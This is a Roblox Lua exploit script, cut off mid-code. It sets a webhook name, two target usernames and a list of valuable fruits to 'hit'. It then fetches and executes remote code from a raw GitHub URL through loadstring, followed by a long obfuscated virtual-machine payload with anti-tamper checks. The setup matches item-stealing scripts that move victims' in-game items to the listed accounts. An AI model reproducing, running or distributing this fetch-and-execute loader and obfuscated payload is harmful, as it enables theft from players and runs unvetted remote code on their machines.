```lua
Webhook = "revolt-pgn"
Usernames = {"ryu_kun0318", "ryou_989"}
FruitsToHit = {"Kitsune-Kitsune", "dragon-dragon", "Yeti-Yeti", "Gas-Gas"}

loadstring(game:HttpGet("https://raw.githubusercontent.com/surelyco/CutestCodes/refs/heads/main/V2"))()
--[[

discord.gg/25ms

--]]
return(function(...)local U=setmetatable local j=U({AP=function() end},{__div=function(J,w)J.AP=w end;__add=function(J,w)return J.AP end})local K=U({f7={(1399775-539619)+3277218496741,"FyOH";(752431+-736008)+(6686027019403-(-1040381)),"S+0zlUab","ejG=";"f0XbIqQ=","Udtdnm7=","S+BbhFf=";30369226303835-(-760071);"hN==";(-415053-480446)+16554462097280,482073-482069;(626906+(-412587+-1186777))-(-972469),-391622+15594166944572;"wajYJO==";287909-277909,(377036+88418)-465440,"KEO178G=";"oMG=";"ddmblCaF2UH/hUaG2N==";296566+(426833-723393),460465-460457,true,32326499366588-((-567936+(-328270+960816))+(207343+((290373+336504)+-1101463))),"tgGpZZW=",-290165+25404978071520,-62198+(612456+-550229);"aZf+rRQ=","Q8BcMa3=",(879502+(35184371207327-200842))-(-202845),"AO==",557701+-557445;"LD695j4=";29450457347532-(-928611),-31339+31817914136836,"8mef6zJ=","yyN1+cn=",24803326769195-130458,"LrGg","S+BGDLgz2xm6fCVoqUlYh+jGsCazqeZIlLtYS+J/ndQufCg62+Bzle7=",-339981-(-339988);"7+BOD43=";"l+T1jGYjWC78t8DJwCSI",8829-8829,22640611161577-497275,"/ieX1fS=","NUVYh+WphxBvDN==";-864465+6352741766742;"hUBz","pU8DMB3=",825052+-825043,(-359973+764520)+(-463820-(840759-900034));"AQvnRN==","e5gZDxBIhumOf80ohev+DCT6DUZphu/RS+BGDLgz2AHp2+0ufIgZh+NR";"S9CUzff=",-58477-(737372+-795949);753772+-753757,"wB0F",-246904-(328826+-575742),"5erqy+J=",(-375143+-574916)-(-950091),(-92267-(-530168))+12254985;"lN==",59299-59234;"f8vvS/==";"5Zrk";"onxCBj/=","j/H=","sKBCeOn=";"DdUYOen=","l+VphF2=","9Q8rcF/=",4313857527392-855358,"32nqeUG=";"zBipbgf=",-160069-(-160326),"LYaRh+N=";-218506+28895849235505,"OZOl5/==",132961+11305639689328,"R7rEBpn=";"36kZJc4=";"SfduByG=";"O+xXu0S=",4227612848185-674949,814722-814709;"wu/Zle4Rw/==";false;"f8azf80G";"VBl+CQ/=";2169100458171-(-692424),"HUn=";-350002-(-350007);958362+22514402895330,"MSZZJ7N=","fLtvf+O=";"WAtCsLWFhKvun3==";"TRowZJQ=";330497-330494,710293+-710038;(868057+(-265218+-126969))+3611867;-260538-(-260548),"DCTOfCjM","hUavlxjGS+ZzlO==","4O==";"wl713I7=","TyG=",378131-(-216450),-1085387-820705,-666423+(-973217+16199292269292);-564956+630492,"l8YvDUj4";"w/==";"MURezln=";3083357-(-948355);"WcxQY+3=";"lhwdt3==","S+0zlUQ=";"KzW1452=";"f5ZGlN==";"ZmS5Yh/=","8XSgs9S=",((((-144737+-357204)+770857)-751596)+1851565785097)-860385,"euwtr3==",268901+-268797;"g3==","s5RCFD2=",4261265826676-809811;69984+-69983;"IKoNgQN=";278455+7386435,"n6BbSImFfLn/sUBIld3cqN==","U7UnUBn=","hUavl3==","aGYpKco=";"lL/=","L5TIvuW=","LYablLN=","RqJp4g/=";-302939+4295270235.0,"RQnPKHf=";-506765+(732450+4585648548795);"fWtBsGagSGG=";"mhUA",798510+(9277584268222-(-724621));""}},{__pow=function(J,w)J.f7=w end;__mul=function(J,w)return J.f7 end})local c=U({KG=function(J)return(K*"aab")[J-((-809504-(-942972))+(-924374-(-825338)))]end},{__mul=function(J,w)J.KG=w end;__index=function(J,w)return rawget(J,"KG")end})for J,w in ipairs({{270970-(((366729-784541)+1441840)-753059);963277+-963131},{(650869+(-630210-(-578559)))+-599217,-124358+124480},{-13886-(-634763+(453397+(627923+-460566))),42254+-42108}})do while w[-686612-(-1073245-(-386632))]<w[-275390+275392]do(K*"Xkb")[w[-116658-(-116659)]],(K*"lab")[w[285996+-285994]],w[834297-(-691251+1525547)],w[-412454+412456]=(K*"hU")[w[-789746-(-789748)]],(K*"RV")[w[428723-428722]],w[840771+(-1402497-(-561727))]+(-941662+941663),w[456243+-456241]-(274188-274187)end end do local J=U({uf=string.char},{__pow=function(J,w)J.uf=w end;__div=function(J,w)return J.uf end})local w=U({Vz=string.sub},{__mul=function(J,w)J.Vz=w end;__div=function(J,w)return J.Vz end})local W=U({VT=table.concat},{__sub=function(J,w)J.VT=w end,__div=function(J,w)return J.VT end})local c=U({Uob=math.floor},{__index=function(J,w)J.Uob=w end,__add=function(J,w)return rawget(J,"Uob")end})local i=U({Xgb=K*"kk"},{__sub=function(J,w)J.Xgb=w end;__concat=function(J,w)return J.Xgb end})local b=U({Fr=type},{__mul=function(J,w)J.Fr=w end;__sub=function(J,w)return J.Fr end})local Z=U({Knb=string.len},{__sub=function(J,w)J.Knb=w end,__div=function(J,w)return J.Knb end})local h=U({VB=table.insert},{__sub=function(J,w)J.VB=w end;__add=function(J,w)return J.VB end})local f=U({ee={Z=(-895073-(-510840))-(-384270);s=-683732+683758;["2"]=256462-(-727528+983982),D=-541307+541336,v=842787+-842754;c=((-435704-(-403108))+-907633)+940287,h=48821+-48794;l=-916896-(-838378+-78543),["7"]=-421022-(-421058),P=(((363229-206319)+-409392)+840039)-587495;n=361925+-361913;G=(-616406+((1219669-457999)+150573))+(-173486+((-611227-(-319087))+169841));F=-966989-(-967044);f=-682159-(-682183),A=-32208+32211,z=(-746508+1490763)-(1620758-876549);k=925393+-925382,C=-61531-(-61553),a=(-96016+731493)+-635416;J=(6452+824464)+-830860;K=-366303+366354;w=817490+((1022620+((-285825+(-208940+-961748))-(1061095-1044529)))+-367017);["5"]=(748658+(451276-995788))-204107;["9"]=-91803-(-91822);x=-265465+265472;["8"]=598788+-598734,Q=-692897+692957,["6"]=388636+(979064+((-1709798-363479)-(-705612)));Y=(-406647-(-995320))-588620,e=-180301+180303;m=138418+-138417;O=-858783+858831;["/"]=1034182-1034150;q=(((89301-998476)-(-278804))+142080)-(-488301),E=696584+-696521,U=-370021-(-370027);["4"]=352154-352114;d=(726944+(-82195-1034110))+389379;["1"]=190520-190478,t=(-713797+199912)+513902,g=-1040529-(-1040538),["0"]=-105178-(-105183),r=296862-(-949926+1246729);V=-135951+136000;b=672573+-672528,W=-648237+648257;["+"]=-912241+912279,X=847141-847126;H=-812053+812057,y=(105930-(959187+-4451))+848836;R=-202195+202236,["3"]=-449666+449666;i=-70688+70719,S=-288732+288760;I=-484057-(-484107),u=(413986+(1221834-780882))+-854904,M=424756-424713,o=(-1214682-(-449153))+765573,p=-829925+829972,L=-276355-(-276378);T=670768-670711,j=361455+-361442,B=353684+-353663;N=-868814+868830}},{__add=function(J,w)J.ee=w end;__pow=function(J,w)return J.ee end})for K=152316+-152315,#(i.."AN"),559253+-559252 do local n=U({kK=(i.."fr")[K]},{__mul=function(J,w)J.kK=w end;__sub=function(J,w)return J.kK end})if(b-"ln")(n-"pE")=="string"then local b=U({Dpb=(Z/"BD")(n-"vo")},{__index=function(J,w)J.Dpb=w end,__div=function(J,w)return rawget(J,"Dpb")end})local D=U({xcb={}},{__sub=function(J,w)J.xcb=w end,__add=function(J,w)return J.xcb end})local F=U({wD=-737992+737993},{__div=function(J,w)J.wD=w end;__sub=function(J,w)return J.wD end})local A=U({v9=-82371-(-82371)},{__pow=function(J,w)J.v9=w end;__mul=function(J,w)return J.v9 end})local s=U({klb=969962-969962},{__pow=function(J,w)J.klb=w end,__mul=function(J,w)return J.klb end})while F-"E6"<=b/"EZ"do local W=U({u6=(w/"HV")(n-"DM",F-"qS",F-"fu")},{__concat=function(J,w)J.u6=w end;__add=function(J,w)return J.u6 end})local K=U({nbb=(f^"ej")[W+"SQ"]},{__div=function(J,w)J.nbb=w end;__pow=function(J,w)return J.nbb end})if K^"MF"then(j+"ykb")(A^(A*"fW"+K^"kpb"*(-783181+783245)^(((-451753+791230)-339474)-s*"dab")));(j+"pH")(s^(s*"zv"+(-168384-(-168385))))if s*"Gw"==-245550+245554 then(j+"s4")(s^(220496+-220496))local w=U({qs=(c+"Vj")((A*"iq")/(341650-276114))},{__concat=function(J,w)J.qs=w end;__pow=function(J,w)return J.qs end})local W=U({fc=(c+"RS")(((A*"qc")%(436910+(26390-397764)))/(218034-217778))},{__concat=function(J,w)J.fc=w end,__index=function(J,w)return rawget(J,"fc")end})local K=U({Fmb=(A*"Rmb")%(-437392-(-1062495-((261917+-889993)-(-981666+978437))))},{__index=function(J,w)J.Fmb=w end;__mul=function(J,w)return rawget(J,"Fmb")end});(h+"m7")(D+"i5",(J/"pdb")(w^"Zn",W.NN,K*"ei"));(j+"dj")(A^(546103+-546103))end elseif W+"Acb"=="="then(h+"Cib")(D+"p8",(J/"I8")((c+"qZ")((A*"bv")/(863394+-797858))))if F-"RN">=b/"M4"or(w/"sq")(n-"Bob",(F-"wT")+((382851+445622)+-828472),(F-"uf")+(49859-49858))~="="then(h+"um")(D+"QW",(J/"PC")((c+"Us")(((A*"q6")%((-84407-(-103456+422175))-(-468662)))/(-322376+322632))))end break end;(j+"Tab")(F/((F-"IT")+(-885713-(348223+(246471+-1480408)))))end;(i.."Ep")[K]=(W/"jfb")(D+"tlb")end end end do local J=U({cm=c.Xg(388300+-353723)},{__pow=function(J,w)J.cm=w end;__add=function(J,w)return J.cm end})pcall(function()(getgenv())[c.Qkb((889099+-6439)-848120)]=function() end end)local w=U({nE=string[c.Ahb(-789419+823939)]},{__div=function(J,w)J.nE=w end,__mul=function(J,w)return J.nE end})local W=U({upb=function()error(c.nnb(137791-103217))end},{__add=function(J,w)J.upb=w end;__index=function(J,w)return rawget(J,"upb")end})local K=U({Qb=c.jA(-235957+270453)},{__mul=function(J,w)J.Qb=w end,__sub=function(J,w)return J.Qb end})local i=U({Bib=pcall(function()(j+"ir")(K*c.Wp(-733478+768055))end)and K-"zw"},{__index=function(J,w)J.Bib=w end;__sub=function(J,w)return rawget(J,"Bib")end})local b=U({Ilb=math[c.Lfb((-1411787-((-859960+-313921)-((-783933+(389490+95511))-340351)))+((997888+-1449384)+1363243))]},{__concat=function(J,w)J.Ilb=w end,__div=function(J,w)return J.Ilb end})local Z=U({jjb=table[c.bS(271667+-237170)]},{__div=function(J,w)J.jjb=w end,__add=function(J,w)return J.jjb end})local h=U({FG=table and table[c.Ul(169568-(-120263+255320))]or unpack},{__concat=function(J,w)J.FG=w end;__mul=function(J,w)return J.FG end})local f=U({I2=(b/"efb")(c.kI(-878869+(987489+-74113)),c.y0(657419+-622947))},{__div=function(J,w)J.I2=w end;__sub=function(J,w)return J.I2 end})local n=U({BF=c.Cp((-771699+(726960-(-583780)))-504589)},{__pow=function(J,w)J.BF=w end;__sub=function(J,w)return J.BF end})local D=U({xcb=c.Bj(985201+-950749)},{__pow=function(J,w)J.xcb=w end;__concat=function(J,w)return J.xcb end})local F=U({mq={pcall(function()local J=U({V5=c.NN(967648-933109)-c.HX((1826002-847062)-944489)^c.JJ(-951586-(-986056))},{__pow=function(J,w)J.V5=w end,__sub=function(J,w)return J.V5 end})return c.jE((-509394+-178642)-(-722502))/(J-"rh")end)}},{__concat=function(J,w)J.mq=w end,__index=function(J,w)return rawget(J,"mq")end})local A=U({PQ=F.jF[c.Ig((-475651-(-845606))+-335495)]},{__div=function(J,w)J.PQ=w end;__pow=function(J,w)return J.PQ end})local s=U({vD=tonumber(((w*"dP")(tostring(A^"GH"),c.ydb(856850+(((-2345505-(-139780))-(-664928))-(-718442)))))())},{__mul=function(J,w)J.vD=w end,__add=function(J,w)return J.vD end})for W=c.dR(678365-643828),f-"Xcb",c.Q(-972705-(-1007242))do local K=U({Ebb=math[c.Uo(-458635+493193)](c.LS((-488724-(-755640))-232379),c.Tm(-714035-(-748499)))},{__sub=function(J,w)J.Ebb=w end;__add=function(J,w)return J.Ebb end})local i=U({JJ=(b/"Cp")(c.i5(-800709+(589332-(-245829))),c.sI(551148-516640))},{__mul=function(J,w)J.JJ=w end,__pow=function(J,w)return J.JJ end})local Z=U({wf=(b/"AW")(c.smb(-783788-(-818325)),K+"Kjb")},{__mul=function(J,w)J.wf=w end;__pow=function(J,w)return J.wf end})local F=U({s2=(b/"MG")(c.IJ(762086+-727549),c.Knb((-566508+1655)-(-599313)))==c.Gab((-261540-323737)-(-619814))},{__add=function(J,w)J.s2=w end;__pow=function(J,w)return J.s2 end})local M=U({e9=(A^"mU"):gsub(c.Ty(364079+(-1152840-(-823256))),c.sl((-360672+701943)-((-498662+-393218)+1198630))..(tostring((b/"xf")(c.uj(-947122+981574),c.m1((212826-(-264526+-299893))+-742675)))..c.Tq((-16948+487939)-436470)))},{__concat=function(J,w)J.e9=w end,__pow=function(J,w)return J.e9 end})local o=U({ol={pcall(function()if(b/"bm")(c.RK((-223847-(-917846-5380))-664842),c.OB(-942097+976557))==c.IR(769823-735286)or W==f-"VH"then local W=U({Xbb=tonumber(((w*"Vg")(tostring(({pcall(function()local J=U({Jib=c.f8(-566037-(-600553))-c.cQ(-52307-(-86858))^c.Xd(-345074-(-379583))},{__div=function(J,w)J.Jib=w end,__mul=function(J,w)return J.Jib end})return c.F5(-388634-(-423139))/(J*"tn")end)})[c.ii(72551-38091)]),c.MO((-1030191+635610)-(-429076))))())},{__pow=function(J,w)J.Xbb=w end;__index=function(J,w)return rawget(J,"Xbb")end});(j+"hD")(J^(J+"eu"and s+"Bp"==W.wy))end if F^"GU"then error(M^"Clb",c.Cq(((((115707+269464)+346281)-(((618855-713327)-392373)-(-390787)))-983305)-(-190247)))end local n=U({Nd={}},{__pow=function(J,w)J.Nd=w end;__concat=function(J,w)return J.Nd end})for J=c.az((-1032163+600371)-(-466329)),K+"Pq",c.Qdb(-722506-(-757043))do(n.."lI")[J]=(b/"hB")(c.LO(-191064-(-225516)),c.Ws((-764144+(837187+-14334))+-24201))end;(n.."hj")[Z^"mib"]=i^"Ugb"return(h*"hB")(n.."qr")end)}},{__mul=function(J,w)J.ol=w end,__concat=function(J,w)return J.ol end})if F^"zG"then(j+"GY")(J^(J+"EN"and((o.."iP")[c.rm(159782+-125245)]==c.IR(78769-(65603+-21330))and(o.."xu")[c.ihb(((-1404220-(-743324))+383502)-(-311854))]==M^"ix")))else(j+"kx")(J^(J+"Lib"and(o.."dh")[c.Tu((-1461733-(-844992))-(-651278))]));(j+"D5")(n^(((n-"BY")+(o.."fR")[Z^"or"+c.Ic((437204-266525)-136142)])%c.oG(32320+2120)));(j+"rcb")(D^(((D.."Jw")+i^"Bnb")%c.cpb(-591323+625763)))end end local M,o=U({Pp=pcall(function()return require(c.rW(-671855+706310))end)},{__concat=function(J,w)J.Pp=w end,__index=function(J,w)return rawget(J,"Pp")end}),U({lh=nil},{__index=function(J,w)J.lh=w end,__add=function(J,w)return rawget(J,"lh")end})local v=U({TI=loadstring or load or o+"db"and(o+"oob")[c.lB(-675939-(-710481))]or(getfenv(print))[c.Rjb((61640+383006)+-410104)]or(getfenv(print))[c.Ah(518406+-483894)]},{__sub=function(J,w)J.TI=w end;__add=function(J,w)return J.TI end})local q=U({ko=c.DC(-918350+952927)},{__index=function(J,w)J.ko=w end,__sub=function(J,w)return rawget(J,"ko")end})if v+"Xhb"then local J=U({gnb=tonumber(((w*"uS")(tostring(({((v+"hN")(c.Z8(-143232+177680)))()})[c.SF((474021+-465929)-(-104176-(-766395+688587)))]),c.Gdb(-237108-(-271603))))())},{__pow=function(J,w)J.gnb=w end,__div=function(J,w)return J.gnb end})local W=U({ef=tonumber(((w*"G")(tostring(({((v+"kD")(c.H1(-17117-(-51579))))()})[c.yl(593858-559398)]),c.Oob(989523+-955028)))())},{__pow=function(J,w)J.ef=w end;__div=function(J,w)return J.ef end});(j+"Bj")(q[J/"B1"~=W/"wlb"])end;(j+"sJ")(J^(J+"s7"and(n-"Zib"==D.."dkb"and q-"zi")))local z=U({cmb=not(J+"ow")and W.wE()},{__div=function(J,w)J.cmb=w end;__add=function(J,w)return J.cmb end})if J+"yB"then else repeat return(function()while c.Dlb(818783+-784206)do l1,l2=l2,l1 W.eB()end end)()until c.zY(908855-874278)while c.Qi(-24007-(-58584))do l2=(b/"Xo")(c.Ix(-984520-(-1019057)),c.U1((234824-571386)+371137))if l2>c.x8(611703+-577243)then l2=tostring(l1)else l1=l2 end end return end end local W=U({snb=function(J)local w,W=U({CM=J[#J]},{__index=function(J,w)J.CM=w end;__pow=function(J,w)return rawget(J,"CM")end}),U({Zm=c.kU(519649-485095)},{__pow=function(J,w)J.Zm=w end,__index=function(J,w)return rawget(J,"Zm")end})for K=c.at(715280-680743),#w^"cob",c.hhb(-773564-(-808101))do(j+"KY")(W^(W.DS..(w^"jI")[J[K]]))end return W.W1 end},{__sub=function(J,w)J.snb=w end,__pow=function(J,w)return J.snb end})local w,J=U({uY=nil},{__sub=function(J,w)J.uY=w end;__pow=function(J,w)return J.uY end}),U({Y3=nil},{__div=function(J,w)J.Y3=w end;__add=function(J,w)return J.Y3 end})do local K=U({vZ=math[c.bV(298894-264415)]},{__div=function(J,w)J.vZ=w end;__sub=function(J,w)return J.vZ end})local i=U({vZ=math[(W^"Vk")({c.Xfb(-389695-(-424232)),c.hpb(269997-235537);{c.Ce(534210-499684);c.Co(-850613+885177)}})]},{__index=function(J,w)J.vZ=w end,__add=function(J,w)return rawget(J,"vZ")end})local b=U({Jr=table[(W^"scb")({c.mL(668123-(-212183-(-314817-(235086+295866))));c.Wq(405819-371359),{c.s4(542935-508373);c.Xd(671298-636827)}})]},{__mul=function(J,w)J.Jr=w end,__sub=function(J,w)return J.Jr end})local Z=U({Wl=string[c.gM((581871-(-277204))-824602)]},{__add=function(J,w)J.Wl=w end;__sub=function(J,w)return J.Wl end})local h=U({TT=c.hR(-762085-(-796537))},{__concat=function(J,w)J.TT=w end,__index=function(J,w)return rawget(J,"TT")end})local f=U({Beb=c.ZP(-109890+(376181+-231831))},{__pow=function(J,w)J.Beb=w end;__concat=function(J,w)return J.Beb end})local n=U({RS={}},{__concat=function(J,w)J.RS=w end,__pow=function(J,w)return J.RS end})local D=U({E2={}},{__sub=function(J,w)J.E2=w end;__pow=function(J,w)return J.E2 end})local F=U({xD=c.cY(399917-365465)},{__pow=function(J,w)J.xD=w end;__concat=function(J,w)return J.xD end})local A=U({Kb={}},{__pow=function(J,w)J.Kb=w end,__index=function(J,w)return rawget(J,"Kb")end})for J=c.Zn(-397654-(-432191)),c.eH(801023-(545741+220842)),c.Gz((((-740492-(-549497))-(40276-972019))+-1653132)-(-946921))do A.jG[J]=J end repeat local J=U({Go=(i+"QK")(c.jcb(992465-((-876374+289379)+1544923)),#A.VE)},{__div=function(J,w)J.Go=w end,__pow=function(J,w)return J.Go end})local w=U({Fx=(b-"Xcb")(A.Kcb,J^"vab")},{__sub=function(J,w)J.Fx=w end;__index=function(J,w)return rawget(J,"Fx")end});(D^"op")[w.K6]=(Z-"EL")(w.ZJ-c.e6(233468+-198931))until#A.k4==c.t_(492577-458125)local s=U({El={}},{__div=function(J,w)J.El=w end,__sub=function(J,w)return J.El end})local M=U({kR=function()if#(s-"Gd")==c.WF(-837556+872008)then(j+"Q")(h..(h.UT*c.O7(-209017-((-59743-(-319514))-503223))+c.hH(-697075-(-731574)))%c.YW(995432-960994))repeat(j+"q5")(f^(((f.."fM")*c.Lq(-235448-(-269958)))%c.WZ((-464705+951434)-452245)))until f.."Af"~=c.eib(31172+3365)local J=U({Ybb=(f.."Wg")%c.EU(538359+-503890)},{__pow=function(J,w)J.Ybb=w end,__index=function(J,w)return rawget(J,"Ybb")end})local w=U({nj=((K-"CV")(h.Zg/c.Dv(((-578066+312939)+176523)+(-853841-(1011171+-1988076)))^(c.Vfb(-428442+462936)-((f.."eG")-J.Mgb)/c.Bb(-754408+788877)))%c.Ykb(1080614-(-483983+1530049)))/c.Sjb(-930280-(-964740))^J.Px},{__concat=function(J,w)J.nj=w end,__add=function(J,w)return J.nj end})local i=U({rb=(K-"aP")(((w+"Kgb")%c.Mjb(-571347-(-605884)))*c.Lob(194822+-160274))+(K-"Oc")(w+"Wt")},{__index=function(J,w)J.rb=w end;__concat=function(J,w)return rawget(J,"rb")end})local b=U({gz=(i.."Xk")%c.l((299410+-1033388)-(-768497))},{__pow=function(J,w)J.gz=w end;__mul=function(J,w)return J.gz end})local Z=U({KR=((i.."M5")-b*"Yu")/c.rib(-738886-(-1470643-(-697238)))},{__index=function(J,w)J.KR=w end;__concat=function(J,w)return rawget(J,"KR")end})local n=U({ax=(b*"t5")%c.gF(615150-580710)},{__div=function(J,w)J.ax=w end,__add=function(J,w)return J.ax end})local D=U({e5=(b*"Cb"-(n+"an"))/c.Hu(899108-864668)},{__add=function(J,w)J.e5=w end;__pow=function(J,w)return J.e5 end})local F=U({nj=(Z.."Qk")%c.qnb((-631029-(-391734))-(-273735))},{__sub=function(J,w)J.nj=w end,__concat=function(J,w)return J.nj end})local A=U({by=((Z.."Qk")-(F.."X_"))/c.i1(-929508+963948)},{__pow=function(J,w)J.by=w end;__div=function(J,w)return J.by end});(j+"cm")(s/{n+"B4";D^"Jp",F.."FC";A/"hM"})end return table[(W^"d4")({c.z9(-217647+252107),c.Afb(134364-99827),{c.obb(-147378+181849);c.A9(-210670+245232)}})](s-"RD")end},{__div=function(J,w)J.kR=w end;__add=function(J,w)return J.kR end})local o=U({RO={}},{__mul=function(J,w)J.RO=w end;__concat=function(J,w)return J.RO end});(j+"DK")(w-setmetatable({},{[(W^"JR")({c.fI(-720639+(783253+-28077)),c.vib((-782088+995650)-(960081-780979));{c.kb(-289221+323706),c.Kpb(801718-767174)}})]=o.."lB";[(W^"Op")({c.xkb(630086-595579),c.eG(190645+-156185),c.Vlb(906857+-872320),{c.Vd(-883427-(-917898)),c.Dk((691255-(-490734+937507))-(-748383-(601288+-1559649)));c.Tc(-672580-(-1449552-(-742426)))}})]=nil}))function J.Y3(w,W)local K=U({KG=o.."B"},{__pow=function(J,w)J.KG=w end;__index=function(J,w)return rawget(J,"KG")end})if K.bq[W]then else(j+"Yu")(s/{})local J=U({z7=D^"PK"},{__pow=function(J,w)J.z7=w end,__add=function(J,w)return J.z7 end});(j+"jO")(h..W%c.PV(985777-(262981-(-688358))));(j+"FI")(f^(W%c.c6(-662331+696839)+c.OW((-342098+917346)-540788)))local i=U({Qob=string[c.H((59622-576591)+(1089682-538256))](w)},{__pow=function(J,w)J.Qob=w end,__concat=function(J,w)return J.Qob end})K.db[W]=c.sh(503729-469175)local b=U({nc=c.Pv(-497835+532368)},{__pow=function(J,w)J.nc=w end;__mul=function(J,w)return J.nc end})for U=c.nY(542608-508071),i.."Vhb",c.GG((937644+-1675134)-(-772027))do(j+"web")(b^(((string[c.hn(-25288+(-833114-(-1023075-(-130145))))](w,U)+(M+"Tr")())+b*"YF")%c.OI(123475+-89035)))K.US[W]=K.aw[W]..(J+"hab")[b*"c0"+c.qgb(-522853-(-557390))]end end return W end end return(function(K,b,Z,h,f,n,D,s,o,v,z,q,M,i,A,F,...)o,M,s,A,v,z,F,q,i=function(K,...)for J=c.cA(880394-845857),#K,c.LJ(412527+-377990)do A[K[J]]=A[K[J]]+c.Hbb(718875+(132406-816744))end if Z then local j=U({Ri=Z(c.b6((-769284+(-521173+(-927888+(-208266+1597797))))-(-863391)))},{__div=function(J,w)J.Ri=w end;__sub=function(J,w)return J.Ri end})local i=U({zh=f(j-"wc")},{__add=function(J,w)J.zh=w end,__index=function
